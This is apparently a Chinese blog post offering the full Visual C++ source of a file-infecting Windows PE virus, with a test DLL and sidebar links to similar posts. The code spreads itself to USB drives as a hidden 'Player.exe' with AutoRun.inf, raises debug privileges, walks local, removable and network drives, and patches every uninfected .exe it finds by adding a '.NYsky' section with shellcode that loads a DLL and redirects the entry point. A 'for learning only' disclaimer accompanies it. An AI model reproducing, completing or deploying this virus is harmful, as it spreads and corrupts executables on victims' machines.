PE型感染病毒 —— VC源码

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量1.8k 收藏 4
点赞数
分类专栏: 技术文章 文章标签: PE 病毒

狼哥的原话:“真正的文件型PE病毒,是不能发布调试版本的,只能靠自己的判断使用发布版本,就算要调试也只能使用其它的调试器,比喻说OllyDbg来调试发布版本......”

 

这类程序调试起来足矣让人精神紊乱,下面是全部的代码,有兴趣的看看吧.....

 

 

这是测试Test.dll源码:

[cpp] view plain copy print ?
  1. /  
  2. // Test.dll  
  3. // by Koma   2009-12-18 0:40  
  4. // http://blog.csdn.net/wangningyu  
  5. #include <windows.h>  
  6. BOOL APIENTRY DllMain( HANDLE hModule,   
  7.                        DWORD  ul_reason_for_call,   
  8.                        LPVOID lpReserved  
  9.                      )  
  10. {  
  11.     HANDLE  hThread;  
  12.     DWORD   dwThread;  
  13.     switch(lpReserved)  
  14.     {  
  15.     case DLL_PROCESS_ATTACH:  
  16.         MessageBox(NULL,"some process is attching !","Test",MB_OK);  
  17.         hThread = CreateThread(NULL,0,SomeFunction,NULL,0,dwThread);  
  18.         WaitForSingleObject(hThread,INFINITE);  
  19.         CloseHandle(hThread);  
  20.         break;  
  21.     case DLL_THREAD_ATTACH:  
  22.         MessageBox(NULL,"some thread is attching !","Test",MB_OK);  
  23.         break;  
  24.     case DLL_THREAD_DETACH:  
  25.         MessageBox(NULL,"some thread is detaching !","Test",MB_OK);  
  26.         break;  
  27.     case DLL_PROCESS_DETACH:    //   
  28.         MessageBox(NULL,"some process is exited !","Test",MB_OK);  
  29.         break;  
  30.     }  
  31.     return TRUE;  

这是主程序源码 

/
// 感染PE文件病毒源码
// by Koma   2009-12-18 0:30
// http://blog.csdn.net/wangningyu
// 程序仅供学习交流,请不要尝试用作非法用途!
// 感谢寂寞的狼、llydd、大飞的指导与技术支持!
/
// 引入头文件
//
#include <afxwin.h>
#include <windows.h>
/
// DiskInfo class
// 采用多线程感染每一个磁盘驱动器
//
class  DiskInfo
{
public:
	CString m_strName;					// 磁盘名称,例如C:
	CString m_strFilePath;				// 感染文件的绝对路径
	BOOL	CurFileIsInject;			// 判断该文件是否被感染过
	DiskInfo();							// 构造函数,用来初始化成员变量
};
/
// DiskInfo 构造函数
// 初始化成员变量
//
DiskInfo::DiskInfo()
{
	m_strFilePath = _T("");
	m_strName	  = _T("");
}
/************************************************************************/
// 全局函数声明
/************************************************************************/
void EmuAllDisk();								// 多线程感染全盘文件
BOOL GetOSVersion();							// 获取操作系统版本是不是NT内核
BOOL InfectPE(CString strFilePath);				// 感染指定路径exe文件
BOOL IsInfect(CString strFile);					// 判断是否被感染过
BOOL CheckPE(FILE* pFile);						// 检查文件格式
int	 Align(int size,unsigned int align);		// 用来计算对齐数据后的大小
int  EmuDiskFiles(LPCTSTR lpStr);				// 遍历指定盘符exe文件
void RaiseToDebug();							// 进程提权
/************************************************************************/
// 全局变量声明
/************************************************************************/
DiskInfo	di;								    // 传递多线程参数:设置盘符名
DiskInfo	diInject;						    // 传递多线程参数:设置文件路径
/************************************************************************/
/* 函数说明:复制到U盘
/* 参    数:无
/* 返 回 值:成功返回0,失败返回非0
/* By:Koma   2009.12.16 20:35
/************************************************************************/
DWORD ThreadInfectU()
{
	while(true)
	{
		// 磁盘类型
		UINT revtype;			
		char name[256]="H://" ;	
		char szName[256]={0};
		char toPath[256]={0};
		char infPath[256]={0};
		char openU[80]={0};
		
		// 遍历所有盘符		
		for(BYTE i=0x42;i<0x5B;i=i+0x01)
		{
			name[0]=i;
			revtype=GetDriveType(name);
			
			// 判断是否是可移动存储设备
			if (revtype==DRIVE_REMOVABLE)
			{	
				// 得到自身文件路径、比较是否和U盘的盘符相同
				GetModuleFileName(NULL,szName,256);	
				if(strncmp(name,szName,1)==0)
				{
					return -1;	
				}
				else
				{
					strcpy(toPath,name);
					strcat(toPath,"//Player.exe");
					strcpy(infPath,name);
					strcat(infPath,"//AutoRun.inf");
					
					// 还原U盘上的文件属性
					SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL);
					SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL);
					
					// 删除原有文件
                    DeleteFile(toPath);
					DeleteFile(infPath);
					
					// 拷贝自身文件到U盘、把这两个文件设置成系统,隐藏属性
					CopyFile(szName,toPath,FALSE);
					SetFileAttributes(toPath,
						FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
					SetFileAttributes(infPath,
						FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
				}
			}
		}
		
		// 休眠5秒检测一次
		Sleep(5000);
	}
}
/************************************************************************/
/* 函数说明:线程 —— 感染指定exe文件
/* 参    数:驱动器名称,如C:
/* 返 回 值:遍历的数目
/* By:Koma   2009.12.17 14:05
/************************************************************************/
DWORD ThreadInject(LPVOID lpParameter)
{
	DiskInfo *diParam = (DiskInfo *)lpParameter;
	BOOL	 bRet = InfectPE(diParam->m_strFilePath);
	if(bRet)
		return 0;
	return -1;
}
/************************************************************************/
/* 函数说明:线程 —— 遍历驱动器exe文件
/* 参    数:驱动器名称,如C:
/* 返 回 值:遍历的数目
/* By:Koma   2009.12.17 14:05
/************************************************************************/
DWORD ThreadDisk(LPVOID lpParameter)
{
	DiskInfo *diParam = (DiskInfo *)lpParameter;
	BOOL	 bRet = EmuDiskFiles(diParam->m_strName);
	if(bRet)
		return 0;
	return -1;
}
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
	RaiseToDebug();								// 提升权限
	EmuAllDisk();								// 依次启动遍历磁盘线程、遍历文件
    MessageBox(NULL,"程序启动成功!","测试",MB_OK);
	return 0;
}
/************************************************************************/       
/* 函数说明:获取应用程序当前目录                                          
/* 参    数:无                                      
/* 返 回 值:返回目录路径、CString类型字符串       
/* By:Koma   2009.12.17 14:25                                   
/************************************************************************/       
CString GetExePath()     
{     
    char pathbuf[260];        
    int  pathlen = ::GetModuleFileName(NULL,pathbuf,260);        
    // 替换掉单杠     
    while(TRUE)        
    {        
        if(pathbuf[pathlen--]=='//')        
            break;        
    }        
    pathbuf[++pathlen]= 0x0;        
    CString  fname = pathbuf;        
    return   fname;        
} 
/************************************************************************/
/* 函数说明:提升进程权限到debug权限
/* 参    数:无
/* 返 回 值:无
/* By:Koma   2009.12.17 21:20
/************************************************************************/
void RaiseToDebug()
{
    HANDLE hToken;
    HANDLE hProcess = GetCurrentProcess();		// 获取当前进程句柄 
	
    // 打开当前进程的Token,就是一个权限令牌,第二个参数可以用TOKEN_ALL_ACCESS
    if (OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        TOKEN_PRIVILEGES tkp;
        if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid))
        {
            tkp.PrivilegeCount = 1;
            tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
			
            //通知系统修改进程权限
            BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
        }
        CloseHandle(hToken);
    }    
}
/************************************************************************/
/* 函数说明:保护文件防止被轻易删除
/* 参    数:无
/* 返 回 值:无
/* By:Koma   2009.12.17 21:42
/************************************************************************/
BOOL OccupyFile(LPCTSTR lpFileName) 
{ 
    RaiseToDebug();								// 提升权限 
	
    // 打开syetem进程,打开前必须赋予PROCESS_DUP_HANDLE权限 
    HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);
    if (hProcess == NULL) 
    { 
        hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, 8); 
        if (hProcess == NULL) 
            return FALSE; 
    } 
	
    HANDLE hFile = NULL; 
    HANDLE hTargetHandle = NULL; 
	
    // 创建一个文件,当然这个文件可以是本来就存在的 
    hFile = CreateFile(lpFileName, GENERIC_READ | GENERIC_EXECUTE | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    
	
    if (hFile == INVALID_HANDLE_VALUE) 
    { 
        // 文件创建或打开失败 
        CloseHandle( hProcess ); 
        return FALSE; 
    }
	return TRUE;
}
/************************************************************************/
/* 函数说明:多线程感染全盘文件
/* 参    数:无
/* 返 回 值:无
/* By:Koma   2009.12.17 22:30
/************************************************************************/
void EmuAllDisk()
{
	CString strTemp;							// 临时字符串
	UINT	revtype;							// 磁盘类型
	char	name[5]= "C:";						// 磁盘名称
	int		nCount = 0;							// 磁盘数量
	HANDLE	hThread[10];						// 最大启动十个磁盘感染线程
	DWORD	dwTid[10];							// 线程PID
	for(BYTE i=0x42;i<0x5B;i=i+0x01)			// 遍历所有盘符
	{
		name[0]=i;
		revtype=GetDriveType(name);
		
		switch(revtype){						// 判断磁盘驱动器的属性
		case DRIVE_FIXED:						// 是否为本地磁盘
		case DRIVE_REMOVABLE:					// 是否为可移动磁盘
		case DRIVE_REMOTE:						// 是否为网络磁盘
			if(nCount>10){						// 最大启动十个线程
				nCount = 0;						// 恢复计数器
				Sleep(30000);					// 休眠30秒
				break;
			}
			strTemp.Format("%c",name[0]);
			strTemp = strTemp + ":";			// 磁盘字符串形式,如C:
			di.m_strName = strTemp;				// 设置感染文件的绝对路径
			hThread[nCount] = CreateThread (NULL, 0, (unsigned long (__stdcall *)(void *))ThreadDisk,(LPVOID)(&di),NULL,&dwTid[nCount]);
			nCount++;
			break;			
		}
	}
}
/************************************************************************/
/* 函数说明:判断操作系统版本
/* 参    数:无
/* 返 回 值:NT以上版本的系统返回TRUE,失败返回FALSE
/* By:Koma   2009.12.18 22:20
/************************************************************************/
BOOL GetOSVersion()
{
	DWORD	dwVersion = 0;
	
	// 如果是Windows 98/Me/95以上的操作系统则返回TRUE
	dwVersion = GetVersion();
	if (dwVersion < 0x80000000)
	{
		return TRUE;
	}
	return FALSE;
}
/************************************************************************/
/* 函数说明:感染exe文件
/* 参    数:strFile	文件路径
/* 返 回 值:成功返回TRUE,失败返回FALSE
/* By:Koma   2009.12.18 21:32
/************************************************************************/
BOOL InfectPE(CString strFilePath)
{
	FILE*					rwFile;						// 被感染的文件
	IMAGE_SECTION_HEADER	NewSection;					// 定义要添加的区块
	IMAGE_NT_HEADERS		NThea;						// 
	DWORD					pNT;						// pNT中存放IMAGE_NT_HEADERS结构的地址
	int						nOldSectionNo;
	int						OEP;
	
	if((rwFile=fopen(strFilePath,"rb"))==NULL){			// 打开文件失败则返回
		return FALSE;
	}
	
	if(!CheckPE(rwFile)){								// 如果不是PE文件则返回
		return FALSE;
	}
	
	fseek(rwFile,0x3c,0);
	fread(&pNT,sizeof(DWORD),1,rwFile);
	fseek(rwFile,pNT,0);
	fread(&NThea,sizeof(IMAGE_NT_HEADERS),1,rwFile);	// 读取原文件的IMAGE_NT_HEADERS结构
	nOldSectionNo=NThea.FileHeader.NumberOfSections;	// 保存原文件区块数量
	OEP=NThea.OptionalHeader.AddressOfEntryPoint;		// 保存原文件区块OEP
	IMAGE_SECTION_HEADER	SEChea;						// 定义一个区块存放原文件最后一个区块的信息
	int SECTION_ALIG=NThea.OptionalHeader.SectionAlignment;
	int FILE_ALIG=NThea.OptionalHeader.FileAlignment;	// 保存文件对齐值与区块对齐值
	memset(&NewSection, 0, sizeof(IMAGE_SECTION_HEADER));
	fseek(rwFile,pNT+248,0);							// 读原文件最后一个区块的信息
	for(int i=0;i<nOldSectionNo;i++)
		fread(&SEChea,sizeof(IMAGE_SECTION_HEADER),1,rwFile);
	
	FILE	*newfile = fopen(strFilePath,"rb+");
	if(newfile==NULL){
		return FALSE;
	}
	fseek(newfile,SEChea.PointerToRawData+SEChea.SizeOfRawData,SEEK_SET);
	goto shellend;
	__asm
	{    
shell:  PUSHAD
			MOV  EAX,DWORD PTR FS:[30H]		;FS:[30H]指向PEB
			MOV  EAX,DWORD PTR [EAX+0CH]	;获取PEB_LDR_DATA结构的指针
			MOV  EAX,DWORD PTR [EAX+1CH]	;获取LDR_MODULE链表表首结点的inInitializeOrderModuleList成员的指针
			MOV  EAX,DWORD PTR [EAX]		;LDR_MODULE链表第二个结点的inInitializeOrderModuleList成员的指针
			MOV  EAX,DWORD PTR [EAX+08H]	;inInitializeOrderModuleList偏移8h便得到Kernel32.dll的模块基址
			MOV  EBP,EAX					;将Kernel32.dll模块基址地址放至kernel中
			MOV  EAX,DWORD PTR [EAX+3CH]	;指向IMAGE_NT_HEADERS
			MOV  EAX,DWORD PTR [EBP+EAX+120];指向导出表
			MOV  ECX,[EBP+EAX+24]			;取导出表中导出函数名字的数目
			MOV  EBX,[EBP+EAX+32]			;取导出表中名字表的地址
			ADD  EBX,EBP
			PUSH WORD  PTR 0X00				;构造GetProcAddress字符串
			PUSH DWORD PTR 0X73736572
			PUSH DWORD PTR 0X64644163
			PUSH DWORD PTR 0X6F725074
			PUSH WORD PTR 0X6547
			MOV  EDX,ESP
			PUSH ECX
			
F1:  
		MOV  EDI,EDX
			POP  ECX
			DEC  ECX
			TEST  ECX,ECX
			JZ  EXIT
			MOV  ESI,[EBX+ECX*4]    
			ADD  ESI,EBP
			PUSH  ECX
			MOV  ECX,15
			REPZ  CMPSB
			TEST  ECX,ECX
			JNZ  F1
			
			POP  ECX
			MOV  ESI,[EBP+EAX+36]			;取得导出表中序号表的地址
			ADD  ESI,EBP
			MOVZX  ESI,WORD PTR[ESI+ECX*2]	;取得进入函数地址表的序号
			MOV  EDI,[EBP+EAX+28]			;取得函数地址表的地址
			ADD  EDI,EBP
			MOV  EDI,[EDI+ESI*4]			;取得GetProcAddress函数的地址
			ADD  EDI,EBP      
			
			PUSH WORD PTR 0X00				;构造LoadLibraryA字符串
			PUSH DWORD PTR 0X41797261
			PUSH DWORD PTR 0X7262694C
			PUSH DWORD PTR 0X64616F4C
			PUSH ESP
			PUSH  EBP
			CALL  EDI						;调用GetProcAddress取得LoadLibraryA函数的地址
			PUSH  WORD PTR 0X00				;添加参数“test”符串
			PUSH  DWORD PTR 0X74736574
			PUSH  ESP
			CALL  EAX
EXIT:  ADD ESP,36							;平衡堆栈
	   POPAD
	}
shellend:
	char*	pShell;
	int		nShellLen;
	BYTE	jmp = 0xE9;
	__asm
	{
		LEA EAX,shell
		MOV pShell,EAX;
		LEA EBX,shellend
		SUB EBX,EAX
		MOV nShellLen,EBX
	}
		
	// 写入SHELLCODE,
	for(i=0;i<nShellLen;i++)
		fputc(pShell[i],newfile);
		
	// SHELLCODE之后是跳转到原OEP的指令
	NewSection.VirtualAddress=SEChea.VirtualAddress+Align(SEChea.Misc.VirtualSize,SECTION_ALIG);
	OEP=OEP-(NewSection.VirtualAddress+nShellLen)-5;
	fwrite(&jmp, sizeof(jmp), 1, newfile);
	fwrite(&OEP, sizeof(OEP), 1, newfile);
		
	// 将最后增加的数据用0填充至按文件中对齐的大小
	for(i=0;i<Align(nShellLen,FILE_ALIG)-nShellLen-5;i++)
		fputc('/0',newfile);
		
	// 新区块中的数据
	strcpy((char*)NewSection.Name,".NYsky");
	NewSection.PointerToRawData=SEChea.PointerToRawData+SEChea.SizeOfRawData;
	NewSection.Misc.VirtualSize=nShellLen;
	NewSection.SizeOfRawData=Align(nShellLen,FILE_ALIG);
	NewSection.Characteristics=0xE0000020;
		
	// 新区块可读可写可执行、写入新的块表
	fseek(newfile,pNT+248+sizeof(IMAGE_SECTION_HEADER)*nOldSectionNo,0);
	fwrite(&NewSection,sizeof(IMAGE_SECTION_HEADER),1,newfile);
	
	int nNewImageSize=NThea.OptionalHeader.SizeOfImage+Align(nShellLen,SECTION_ALIG);
	int nNewSizeofCode=NThea.OptionalHeader.SizeOfCode+Align(nShellLen,FILE_ALIG);
	fseek(newfile,pNT,0);
	NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress=0;
	NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size=0;
	NThea.OptionalHeader.SizeOfCode=nNewSizeofCode;
	NThea.OptionalHeader.SizeOfImage=nNewImageSize;
	NThea.FileHeader.NumberOfSections=nOldSectionNo+1;
	NThea.OptionalHeader.AddressOfEntryPoint=NewSection.VirtualAddress;
		
	// 写入更新后的PE头结构
	fwrite(&NThea,sizeof(IMAGE_NT_HEADERS),1,newfile);
	fclose(newfile);
	fclose(rwFile);
	return TRUE;
}
/************************************************************************/
/* 函数说明:判断文件是否被感染
/* 参    数:strFile	文件路径
/* 返 回 值:成功返回TRUE,失败返回FALSE
/* By:Koma   2009.12.18 22:35
/************************************************************************/ 
BOOL IsInfect(CString strFile)
{
	HANDLE	hFile;								// 保存文件句柄
	HANDLE	hMapping;							// 内存文件映射句柄
	void*	pBasePointer;						// PE入口点
	int		dwSestion;							// 节结数
	int		i;									// 临时循环变量
	BOOL	bRet = FALSE;						// 返回值
	
	IMAGE_DOS_HEADER *imDos_Headers;			// 定义DOS头
	IMAGE_NT_HEADERS *imNT_Headers;				// 定义PE头
	IMAGE_SECTION_HEADER *imSECTION_Headers;	// 定义SECTION表头
	
	// 打开文件
	hFile=CreateFile(strFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING, 
		FILE_ATTRIBUTE_NORMAL,0);
	if (hFile==INVALID_HANDLE_VALUE){
//		GetLastError(); 
		return FALSE; 
	} 
	
	// 创建内存映射文件
	if (!(hMapping=CreateFileMapping(hFile,0,PAGE_READONLY|SEC_COMMIT,0,0,0))){
		CloseHandle(hFile);
		CloseHandle(hMapping);
		return FALSE;
	}
	if (!(pBasePointer=::MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0))){									
		CloseHandle(hFile);
		CloseHandle(hMapping);
		return FALSE;
	}
	
	// 设置初始指针地址
	imDos_Headers=(IMAGE_DOS_HEADER *)pBasePointer;	
	if(!(imDos_Headers->e_magic ==IMAGE_DOS_SIGNATURE)){
		CloseHandle(hFile);
		CloseHandle(hMapping);
		return FALSE;
	}
	
	// NT头指针地址
	imNT_Headers=(IMAGE_NT_HEADERS *)((char *)pBasePointer+imDos_Headers->e_lfanew);
	
	// 读取节表名
	CString strTemp = "";
	CString strSectionName;
	for(i=0,imSECTION_Headers =(IMAGE_SECTION_HEADER *)((char *)imNT_Headers+sizeof(IMAGE_NT_HEADERS));i<imNT_Headers->FileHeader .NumberOfSections;i++,imSECTION_Headers++)
	{
		strTemp.Format("第%d节:%s/n",i+1,imSECTION_Headers->Name);
		strSectionName = strSectionName + strTemp;
		dwSestion = i;
	}
	
	// 查找节点是否存在
	// MessageBox(strSectionName);
	if(strSectionName.Find(".data")>0){
		bRet = TRUE;
	}
	
	// 关闭句柄、释放文件
	CloseHandle(hMapping);
    CloseHandle(hFile);
	return bRet;
}
/************************************************************************/
/* 函数说明:用来计算对齐数据后的大小
/* 参    数:size		计算大小
/*			 align		对齐后的长度
/* 返 回 值:对齐数据后的大小
/* By:Koma   2009.12.18 23:25
/************************************************************************/
BOOL CheckPE(FILE* pFile)
{    
	fseek(pFile,0,SEEK_SET);
	BOOL  bFlags=FALSE;
	WORD  IsMZ;
	DWORD  IsPE,pNT;
	fread(&IsMZ,sizeof(WORD),1,pFile);
	if(IsMZ==0x5A4D)
	{
		fseek(pFile,0x3c,SEEK_SET);
		fread(&pNT,sizeof(DWORD),1,pFile);
		fseek(pFile,pNT,SEEK_SET);
		fread(&IsPE,sizeof(DWORD),1,pFile);
		if(IsPE==0X00004550)
			bFlags=TRUE;
		else
			bFlags=FALSE;
	}
	else
		bFlags=FALSE;
	fseek(pFile,0,SEEK_SET);
	return bFlags;
}
/************************************************************************/
/* 函数说明:用来计算对齐数据后的大小
/* 参    数:size		计算大小
/*			 align		对齐后的长度
/* 返 回 值:对齐数据后的大小
/* By:Koma   2009.12.18 23:42
/************************************************************************/
int Align(int size,unsigned int align)
{
	if(size%align!=0)
		return (size/align+1)*align;
	else 
		return size;
}
/************************************************************************/
/* 函数说明:遍历感染指定驱动器中所有exe文件
/* 参    数:驱动器名称,如C:
/* 返 回 值:遍历的数目
/* By:Koma   2009.12.18 23:55
/************************************************************************/
int EmuDiskFiles(LPCTSTR lpStr)
{
	CFileFind	fd;
	CString		strWild(lpStr);
	CString		str = fd.GetFilePath();	        // 获取每个文件的绝对路径
	int			nTemp = 0;				        // 最大启动5个线程同时感染
	BOOL		bRet;
	HANDLE		hThread;
	DWORD		dwTid;
	strWild += _T("//*.*");						// 查找类型
	bRet = fd.FindFile(strWild);				// 开始查找
	while (bRet){								// 如果不为空,继续遍历
ReEmu:		bRet = fd.FindNextFile();			// 查找下一个文件
		if(fd.IsDots())							// 过滤目录自身与上层目录
			continue;
		else if(fd.IsDirectory()){				// 判断是否为文件夹
			CString str = fd.GetFilePath();		// 获取文件夹路径
			EmuDiskFiles(str);					// 继续遍历子目录
		}
		else
		{
			int nTemp1 = str.Find("WINDOWS");	// 如果是XP系统目录则跳过
			int nTemp2 = str.Find("WINNT");	// 如果是WIN2000系统目录也跳过
			if(nTemp1>0 || nTemp2>0)
				goto ReEmu;
			if(str.Find(".exe")>0){			// 判断是否为exe扩展名
				if(!IsInfect(str))				// 判断是否感染过
				{
					di.m_strFilePath = str;	    // 设置感染文件的绝对路径
					hThread = CreateThread (NULL, 0, (unsigned long (__stdcall *)(void *))ThreadInject,(LPVOID)(&diInject),NULL,&dwTid); 
					WaitForSingleObject(hThread,INFINITE);
					//InfectPE(str);
				}
				continue;
			}
		}
		Sleep(10000);                           // 10秒种遍历一个文件
	}
	return 0;
}
/
// 感染PE文件病毒源码
// by Koma   2009-12-18 0:30
// http://blog.csdn.net/wangningyu
// 程序仅供学习交流,请不要尝试用作非法用途!
/


清钟沁桐
关注
专栏目录
识别系统,vc源码,opencv
12-26
1.首先单击载入图像菜单项(载入背景和前景图像),图像在image文件夹下面。 2.然后单击车辆提取菜单项,依次进行图像做差、二值化、开运算、图像去噪、图像填充处理。 3.再单击轮廓提取菜单项,提取车辆轮廓。...
憨憨也能写出PE病毒
bbszhenshuai的博客
05-18 2545
导语 这是我软件安全作业,希望对想要学习PE病毒编写的同学们有所帮助。 目标 编写一个PE文件传染程序infect.exe,功能要求如下: infect.exe运行后,向同目录下的notepad.exe程序植入“病毒载荷”代码. infect.exe不能重复传染notepad.exe. notepad.exe被植入“病毒载荷”后,具备如下行为:一旦执行,就会向其所在目录写入一个txt文件,文件名为:学号-姓名.txt,文件内容为空。注意:这里的姓名和学号要改为同学自己的名字和学号。 基本思路 infe
loadEXEPE感染详细VC源码注释
qq_42577465的博客
06-03 321
// loadEXE.cpp : Defines the entry point for the console application. //实现将笔记本程序插入到计算器程序并替换掉程序进程名 #include "stdafx.h" #include <windows.h> #include <stdio.h> struct MZHeader //DOS { ...
关于PE病毒编写的学习(九)——追加病毒的编写(上)
蛛丝
10-27 1838
  OK,兑现我的承诺,从本章开始讲述“追加病毒”的编写方法。我们将实现一个只弹出对话框的良性病毒,但是考虑到这个代码可能造成的危害,我会在感染模块中写入一个小Bug。不过,对于大家的学习是毫无影响的。  回到正题,先介绍一下“追加病毒”,在DOS时代中,这种病毒相当常见。由于.com文件的入口点是固定的,而且我们知道DOS平台程序可以随意使用中断,因此追加病毒只要将病毒代码追加到宿主文件尾,然后修改入口点代码成“jmp [病毒入口点]”,病毒执行完成后,再jmp到宿主程序。  到了win32平台下,这种方
关于PE病毒编写的学习
蛛丝
08-30 3792
首先声明,因为害怕被封号,我肯定不会展示正确完整病毒代码,但是会介绍可行的学习方法。网上有很多关于介绍PE病毒编写的帖子,但基本上都是分析源码FunLove和《计算机病毒分析与对抗》中PE病毒的代码翻版。事实上这两个代码是用于原理展示,前者根本通不过编译,后者编译后并不能正确运行,虽然有部分帖子对其做了修改,受到正统汇编教材代码的影响,导致其修改方法是错误的。关于病毒编写充满了各种各样的迷信和谬论,因此在学习的过程中,我走了不少弯路,让我来一一说明:误区1:PE病毒一定要用汇编来写,其生成文件小,效率高,病
PE文件感染程序设计(PE病毒
最新发布
Zyecho的博客
01-11 2744
记录PE病毒设计的入门实验
PE文件感染 VC6.0 源码 PE结构
02-15
在IT领域,特别是软件开发和安全分析中,"PE文件感染 VC6.0 源码 PE结构"是一个重要的主题。PE(Portable Executable)文件是Windows操作系统中的可执行文件格式,而VC6.0是Microsoft Visual C++ 6.0的简称,是一款...
SuperMap Objects入门——VC源码.zip
02-27
《SuperMap Objects入门指南——基于VC源码解析》 SuperMap Objects是SuperMap公司推出的一款强大的GIS(地理信息系统)开发组件,它提供了丰富的地图操作、空间数据处理、空间分析等功能,广泛应用于地理信息...
修改windows PE文件的VC源码.zip
06-18
本压缩包"修改windows PE文件的VC源码.zip"提供了一个使用Microsoft Visual C++(VC++)进行PE文件修改的实际案例,主要涉及显示进程的PID(Process ID)、SIZE等相关信息。以下将详细解析这个项目中的关键知识点: ...
windowsPE结构查看VC源码
11-25
在本项目"windowsPE结构查看VC源码"中,我们主要探讨的是如何通过源代码分析和查看PE文件的头部信息、导入导出函数以及重定位信息。 首先,我们需要了解PE文件的基本结构。PE文件由一个或多个节(Section)组成,每...
关于PE病毒编写的学习(十)——追加病毒的编写(下)
蛛丝
10-30 2709
  原本这一篇应该和上一篇同时发,但是我的原来代码写得很烂,而且由于我的目标是编写一个“追加病毒”框架,代码又要具备良好的模块特征。这两天改来改去,已经头脑混乱了,所以还是先发文章把原来的代码挂上,有时间再改,我会配上说明。  另外提一句,我把一个bug写再AddSection这个函数里,很多教学码也故意写这个错误,这个错误本意是修改由于PE文件头的修改使“xx值”应适当变化,实际写入的是空位置,这个值不应该变化,这个画蛇添足的行为会导致被感染文件出现一个对齐问题的错误,使系统认为它不是一个有效文件。自己独
写了一个添加节感染Intel X86 PE文件的程序(Virus)
_KaQqi的博客
02-08 570
为了加深一下PE文件的理解 就随手写了一个 其实ASM才是病毒的王道23333 不需要重定位 嘿嘿~ 这个程序会感染当前目录以及所有子目录中的所有的Intel x86类PE文件 写的不是很好 大牛勿喷. .686p .model flat,stdcall option casemap:none include InfectPe.inc .code start: assume
VC实现简单的PE文件感染(增加的是downloader功能)
weixin_34004750的博客
03-17 169
所有的的实现都封装好。调用的头文件在pe1.h中。有两个方法 一个是int PeFiles(),实现对system32下面指定的exe文件进行感染 第二个是void ScanDisk(const char* path),对指定目录实现遍历感染PE感染源代码下载 转载于:https://blog.51cto.com/realwizard/912...
PE文件病毒实验(二)——实验报告
热门推荐
jmhIcoding
03-01 1万+
实验目的:掌握PE文件格式;理解病毒感染PE文件的原理。 实验内容: (1) 了解PE文件格式。 (2) 根据实验步骤,编程实现在PE文件中插入病毒代码。运行插入病毒代码后的PE文件。 (3) 编程实现在磁盘中搜索.exe文件的操作,对于所有的.exe文件插入病毒代码并运行插入病毒代码后的exe文件。 (4) 编程实现在磁盘中搜索(3)中的.exe文件的操作,对于所有的.exe文件删除病毒代码并运...
WIN32 汇编写病毒感染PE文件
枪与玫瑰的专栏
05-05 4544
WIN32 汇编写病毒感染PE文件作者:PSH 日期:2007/3/26转载请注明出处,本人原创,欢迎交流。近来没事学习了下病毒技术,看到网上好多年青人对这个比较感兴趣,那就写出来大家分享下吧。1前提知识a.熟练WIN32 ASM 语言,不会ASM就难得写出感染PE病毒。比如“熊猫”,就不是ASM 写的,他感染PE就是个捆绑机。b.熟悉PE文件的格式,不了解PE怎么写病毒病毒就是修改PE文件。
EXP2 分析PE感染程序
zjlong668的博客
04-16 966
1.分析感染后的可执行程序 感染前和感染后对比: main-new.exe:最先传播病毒的exe文件,大小:3KB test.exe:感染目标,感染前大小:2.5KB test2.exe:感染后的exe文件,感染后大小:6.5KB winhex打开这两个文件,利用相关功能分析(查看—>同步和比较) 感染前后文件不一样的地方就被winhex用黑色给标记出来了 一共有四处不一样: 感染前有3个节(00 03)感染后有4个节(00 04) 感染前时间戳为B...
基于C++的shellcode及植入目标程序设计 课程报告+代码及exe可执行文件
毕业作品网站
05-15 601
目录 一.程序模块划分 1 二.主要模块描述 1 2.1 Shellcode 的生成 1 2.2 infect.cpp 简介 5 SetBytes 用于向文件指定位置覆盖写入 5 GetBytes 用于读取文件指定位置内容 5 获得 Dos 头中的 e_lfanew,即 PE 头的 RVA 6 三.传染模块的设计与实现 6 验证 PE 文件 8 2.获取 PE 头位置 9 四.PE 文件格式简述 10 Dos 头 10 PE header 11 SECTION TABLE 节
PE文件病毒感染示例
long_xing的专栏
05-29 5295
;本程序修改自hume的代码,其版权信息如下:CopyRight              db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah                       db "        Thx for using it!",0dh,0ah                       db "Contact: Hume
PE 文件病毒编写实验(一)
jmhIcoding
11-09 1万+
这个学期终于圆了当年来读渣电的网络安全专业的一个梦:PE病毒编写。想起了高中那会儿熬夜看看雪论坛瞎搞什么软件破解,可是搞到后面很多东西不理解做的不深入,所以就先一本心思的考上渣电,然后再来深入的学习一下PE的相关。后面 渣电是考上啦,网络安全专业也考上啦,可是大一到大三虽然偶然零零星星地看了一些PE相关的东西,却一直没有集中化的时间来研究PE,因为总是有其它项目找上自己。这个学期刚好有计算机病毒这门
MFC消息机制解析与VC项目源码
"VC编程技术600个大项目源码包含了MFC消息机制的实践应用,通过深入学习这些源码,开发者可以更好地理解和掌握Windows应用程序的基础架构与事件处理流程。" 在VC++编程中,MFC(Microsoft Foundation Classes)是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
